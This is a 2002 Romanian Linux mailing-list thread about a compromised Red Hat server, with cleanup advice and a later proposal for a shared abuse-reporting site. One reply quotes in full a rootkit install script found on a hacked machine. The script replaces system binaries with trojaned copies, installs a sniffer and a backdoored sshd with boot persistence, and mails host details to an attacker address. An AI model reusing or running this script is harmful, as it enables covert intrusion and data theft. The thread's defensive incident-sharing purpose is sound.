/me se ofera sa ajute la engine-ul site-ului daca e vorba de php+mysql poate si postgresql.
Baba Bogdan said: > ofer eu hosting > T1 -SUA QWEST.NET > > > > On Sat, 25 May 2002, Petre Daniel wrote: > >> ideea e excelenta.vorbitzi prea mult pe lista,parerea mea. >> votatzi un site central (cine se ofera cu hosting) eu n-am prea multa >> banda,dar ofer domeniu. >> cine se pricepe la php&db sa seteze un mic engine pe site.se inscriu >> adminii cu adresele lor shi trimit mailuri cu loguri grepuite frumos >> la adresa centrala care sorteaza shi pune pe web cine ataca shi unde. >> deshi sunt contracte la mijloc shi destul de multe interese,eu unul >> daca vad pe www.abuse.ro ca de la ipul 194.102.92.x s-au facut >> attempturi sau incercari de exploatare a serviciilor lu gushteru sau >> gagiului ala care-shi tzine un cafe shi el cu greu,ori firmei XXX >> serioase,fac ceva ca sa vad cine din retzea mea face prostioare shi >> daca e posibil sa scap de el. mi se pare aiurea sa permitem unor >> pushti sa se joace cu serverele shi sa foloseasca abuziv banda. >> informatzia e cea mai puternica shi daca ne putem oferi unii altora >> informatzie valoroasa eu zic s-o facem odata. >> loguri am shi eu destul,m-au atacat destui,dar m-am descurcat singur >> pentru ca nu shtiu unde-ash putea reclama shi ce s-ar putea face. >> de ce sa nu ne ajutam ca admini cand o putem face ? >> bla bla. >> haidetzi odata. >> >> Petre L. Daniel,System Administrator >> Canad Systems Pitesti Romania >> Tel:+4048206200,+4048220044 >> http://www.cyber.ro >> >> t 05:35 PM 5/25/02 -0700, you wrote: >> >Hello Petre, >> > >> >Saturday, May 25, 2002, 5:14:28 PM, you wrote: >> > >> >PD> 2 mbps cu abuse.zone.ro sa zicem.. >> > >> >sa vedem intai ca exista interes din partea "target-ului" :) >> > >> >Gusherul >> > >> >PD> /me >> > >> >PD> At 01:08 PM 5/25/02 -0700, you wrote: >> > >>Hello paul, >> > >> >> > >>Un lucru tot e bun. Ca mi-ai zis adresa de mail. Care mai are >> > >>rootkituri sariti cu emailurile unde se duc info despre server. >> > >>Asha mai scapam de ei oleak:) >> > >> >> > >>Gushterul >> > >>P.S. Hapropo ce-ar fi o pagina de web cu toti? Nu sa punem rk >> > >>acolo ci info sha shthie homu' lha khare sha hai dhea in khap. >> > >>Reformulez cine face hosting? :) >> > >> >> > >>Friday, May 24, 2002, 11:38:02 PM, you wrote: >> > >> >> > >>pzeur> Reinstall tot dupa care te inregistrezi cu rhn_register la >> > >>rh network si >> > >>pzeur> dupa ce ai inscris sitemul tau la ei poti folosi "up2date >> > >>-u" pentru pzeur> update-uri la zi. Seamana a wingoz dar merge >> > >>bine. >> > >>pzeur> Daca ai probleme cu conexiunea il lasi sa aduca headerele, >> > >>pe >> > care le >> > >>pzeur> pune in /var/spool/up2date, (ai de downloadat vreo 200 mb >> > >>de >> > updateuri) >> > >>pzeur> cauta un mirror apropiat la updates.redhat.com (ex: >> > >>ftp.ubbcluj.ro) aduci >> > >>pzeur> de acolo pachetele corespunzatoare headerelor pe care le >> > >>pui in pzeur> /var/spool/up2date si repornesti "up2date -u". >> > >> >> > >> >> > >>pzeur> si mie mi-a gaurit wu-ftpd-u din rh7.2 dar rootkitu era >> > >>pentru alt sistem >> > >>pzeur> asa ca l-am gasit dupa vreo 3 ore (asteptam sa se termine >> > >>"up2date -u" cu >> > >>pzeur> serviciile pornite de bou ce am fost:) cind ps, ls , >> > >>netstat nu mergeau. >> > >>pzeur> asa ca am adus repede respectivele app de pe alt sistem, si >> > surpriza... >> > >>pzeur> nfsd -q -p 50000 care era un sshd modificat. m-am uitat >> > >>prin >> > directoare >> > >>pzeur> si am gasit in /var/ftp/ un director care nu era acolo >> > >>ultima data cind m-am >> > >>pzeur> uitat. Cautind prin fisierele din el dau de o cale la ceva >> > director de >> > >>pzeur> librarii unde era cam asa ceva: >> > >>pzeur> . >> > >>pzeur> .. >> > >>pzeur> .lib >> > >>pzeur> .tooz >> > >> >> > >>pzeur> in .tooz era fisierul install: >> > >>pzeur> #private version from cur / not hacked by lamme assz as >> > >>Em|nem or others! >> > >>pzeur> #phear my reverge all u mother fuckers >> > >>pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun >> > >>pzeur> #!/bin/sh >> > >>pzeur> unset HISTFILE >> > >>pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/ >> > >>pzeur> chattr -iau /bin/ps >> > >>pzeur> chattr -iau /bin/ls >> > >>pzeur> chattr -iau /bin/netstat >> > >>pzeur> chattr -iau /bin/lpd >> > >>pzeur> rm -rf /etc/ssh* >> > >>pzeur> clear >> > >>pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib >> > >>sh sysinfo1 >> new-host >> > >>pzeur> sh ssh_random_key >> > >>pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/ >> > >>pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/ >> > >>pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/ >> > >>pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps >> > >>pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls >> > >>pzeur> mv ps /bin/ps >> > >>pzeur> mv ls /bin/ls >> > >>pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/ >> > >>pzeur> mv netstat /bin/netstat >> > >>pzeur> chown root.root /bin/ls >> > >>pzeur> chown root.root /bin/ps >> > >>pzeur> chown root.root /bin/netstat >> > >>pzeur> mv linsniffer /bin/lpd >> > >>pzeur> rm -rf /etc/ssh* >> > >>pzeur> rm -rf /usr/man/man8/rpc.rstatd.8 >> > >>pzeur> rm -rf /usr/sbin/rpc.rstatd >> > >>pzeur> rm -rf /usr/sbin/rpc* >> > >>pzeur> lpd & >> > >>pzeur> ./lpd >> > >>pzeur> mv sshd /bin/nfsd >> > >>pzeur> mv -f sshd_config /etc/ >> > >>pzeur> mv -f ssh_host_key /etc/ >> > >>pzeur> mv -f ssh_random_seed /etc/ >> > >>pzeur> mv -f ssh_host_key.pub /etc/ >> > >>pzeur> rm -rf ssh_random_key >> > >>pzeur> chattr +iau /bin/nfsd >> > >>pzeur> chattr +iau /etc/sshd_config >> > >>pzeur> chattr +iau /etc/ssh_host_key >> > >>pzeur> chattr +iau /etc/ssh_random_seed >> > >>pzeur> chattr +iau /etc/ssh_host_key.pub >> > >>pzeur> nfsd -q -p 50000 >> > >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit >> > >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet >> > >>./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED] >> > >>pzeur> cat new-host |mail -s >> > >>pzeur> #-----done with ssh---- >> > >>pzeur> killall -9 portmap >> > >>pzeur> killall rpc.statd >> > >>pzeur> rm -f /usr/sbin/rpc.statd >> > >>echo "ftp">>>/etc/ftpusers >> > >>echo "root">>>/etc/ftpusers >> > >>pzeur> cat /proc/cpuinfo >> > >>pzeur> mv pwd /dev/capi20.20 >> > >>pzeur> rm -f sysinfo1 >> > >>pzeur> rm -f sysinfo >> > >>pzeur> rm -f new-host >> > >>pzeur> rm -f sshd >> > >>pzeur> cd .. >> > >>pzeur> rm -rf s.tgz >> > >>pzeur> clear >> > >>pzeur> echo >> > >>"****************************7.1***************************" >> > >>pzeur> echo "Oki" >> > >>pzeur> echo >> > >>"***********************SpUrKaTu&TrUnKS********************" >> > >> >> > >> >> > >>pzeur> mai era un fisier .1addr: >> > >>pzeur> 2 194.105 >> > >>pzeur> 3 6666 >> > >>pzeur> 3 6667 >> > >>pzeur> 3 54789 >> > >>pzeur> 3 31337 >> > >>pzeur> 3 6668 >> > >>pzeur> 3 6669 >> > >>pzeur> 3 6666 >> > >>pzeur> 2 194.102.233 >> > >>pzeur> 2 209.142.209.161 >> > >>pzeur> 2 217.10 >> > >>pzeur> 2 213.233 >> > >> >> > >> >> > >>pzeur> am pastrat fisierele ca poate nu se stie niciodata, mai >> > >>sunt printre ele : >> > >>pzeur> hideps install lpd sense string tcp.log utils wipe >> > >>pzeur> .1addr .1file .1proc .ls netstat .ps >> > >> >> > >>pzeur> cam asta ma mai gasit >> > >> >> > >>pzeur> in general e bine ai copii originale dupa ls, ps, netstat >> > >> >> > >>pzeur> bafta >> > >> >> > >> >> > >>pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote: >> > >> >> > >> >> Rulez un sistem RH 7.2 pe care am depistat o intruziune. Mi-am >> > >> >> dat seama de asta pentru ca nu mergeau corect anumite comenzi. >> > >> >> 1. Am reparat pachetele compromise (net-tools, fileutils si >> > >> >> procps) cu rpm -U --force ... >> > >> >> 2. Am download-at chkrootkit si chkproc imi spune ca ruleaza 2 >> > >> >> procese ascunse: >> > >> >> - You have 1 process hidden for readdir command >> > >> >> - You have 1 process hidden for ps command >> > >> >> 3. chkrootkit "intepeneste" la verificare la pozitia >> > >> >> Checking 'aliens'... >> > >> >> 4. Cand rebootez PC-ul imi da niste erori la demontarea >> > >> >> partitiei /usr --> Illegal seek >> > >> >> 5. Cand bootez imi apar cateva mesaje cum ca un program este >> > >> >> shareware si nu stiu ce... si ca asculta pe portul 7000 >> > >> >> 6. In boot.log apare linia >> > >> >> ... Starting backdoor daemon... Done, pid=... >> > >> >> Acum va intreb: >> > >> >> - mai pot fi si alte pachete compromise in afara de cele >> > >> >> numite? - ce este cu acele procese ascunse si cum scap de ele? >> > >> >> - de ce intepeneste chkrootkit? >> > >> >> - daca este intr-adevar vorba de backdoor, cum scap de el? >> > >> >> >> > >> >> Cu speranta ca nu va "sictiresc" cu un mail asa de lung, va >> > >> >> multumesc anticipat pentru ajutor. >> > >> >> Gaby >> > >> >--- >> >Pentru dezabonare, trimiteti mail la >> >[EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. >> >REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ >> >> --- >> Pentru dezabonare, trimiteti mail la >> [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. >> REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ >> >> > > -- > Baba Bogdan > > System Administrator > CDS NETWORK, Corpus Christi, TX, US > --------------------------------o0()()0o------------------------------- > We can forgive a child who is afraid of the dark; the real tragedy of > life is when men are afraid of the light. > - Plato > > > --- > Pentru dezabonare, trimiteti mail la > [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ --- Pentru dezabonare, trimiteti mail la [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
